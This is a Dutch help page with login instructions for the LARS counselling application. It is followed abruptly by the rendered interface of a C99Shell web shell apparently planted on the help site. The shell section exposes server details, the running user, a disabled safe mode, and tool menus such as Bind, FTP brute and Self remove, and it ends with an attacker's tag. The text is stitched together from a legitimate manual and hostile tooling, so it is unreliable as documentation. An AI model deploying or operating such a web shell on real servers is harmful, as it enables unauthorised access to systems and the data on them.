Inloggen

LARS als webapplicatie:

Om met LARS te kunnen werken, moet je via een webbrowser de juiste webstek openen. De best ondersteunde browsers zijn Mozilla Firefox, Microsoft Internet Explorer en Google Chrome.
Het is aan te raden naar de LARS-website www.clb-lars.be te surfen en van daaruit door te klikken naar de applicatie. Op de startpagina van de LARS-website staat nl. interessante informatie die u niet aangeboden krijgt als u rechtstreeks naar de applicatie navigeert.
Tip: u bespaart tijd door www.clb-lars.be als startpagina van uw browser in te stellen.

Vanuit de website hebt u de keuze om door te klikken naar de LARS-oefenomgeving, LARS-edison of LARS-productieomgeving. Deze laatste is de “echte” omgeving: https://app.clb-lars.be/  waarover we het in deze handleiding hebben.

Inloggen:

LARS is een beveiligde omgeving. Een CLB-medewerker die met het programma aan de slag wil, kan slechts toegang krijgen dmv. een gebruikersnaam en paswoord. Die moet u verkrijgen van de (LARS-)verantwoordelijke op het CLB.
Een LARS-gebruiker beschikt over slechts één gebruikersnaam en bijhorend wachtwoord, ongeacht in hoeveel verschillende CLB’s hij/zij tewerkgesteld is.

Bij surfen naar de productieomgeving, komt volgend scherm te voorschijn:

Standaardsituatie:

 • Vul de ‘gebruikersnaam’ en het ‘wachtwoord’ in en klik op [Login].

Inloggen als u in verschillende CLB’s werkzaam bent:

 • Vul gebruikersnaam en wachtwoord in en klik op [Login], zoals hierboven beschreven.
 • Selecteer het CLB waarvoor u wenst in te loggen door dit aan te klikken.
 • Klik op [Login] boven het keuzevak
 • Naargelang het gekozen CLB, zullen de specifieke rechten die u in dat CLB heeft mbt. LARS, opgehaald en toegepast worden.

Nadat u bent ingelogd, komt u op het beginscherm.

  help.clb-lars.be c99txt.org- c99shell

  !C99Shell v. 1.0 beta (21.05.2005)!

  Software: Apache/2.2.12 (Linux/SUSE). PHP/5.3.8 

  uname -a: Linux weblemonade01 3.0.42-0.7-default #1 SMP Tue Oct 9 11:58:45 UTC 2012 (a8dc443) x86_64 

  uid=30(wwwrun) gid=8(www) groups=8(www),1001(ict) 

  Safe-mode: OFF (not secure)

  /home/drupal-zkhelp/public_html/   drwxr-xr-x
  Free 9.89 GB of 29.53 GB (33.5%)
  Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Bind    Proc.    FTP brute    Sec.    SQL    PHP-code    Feedback    Self remove    Logout    


  GaRDeNFoX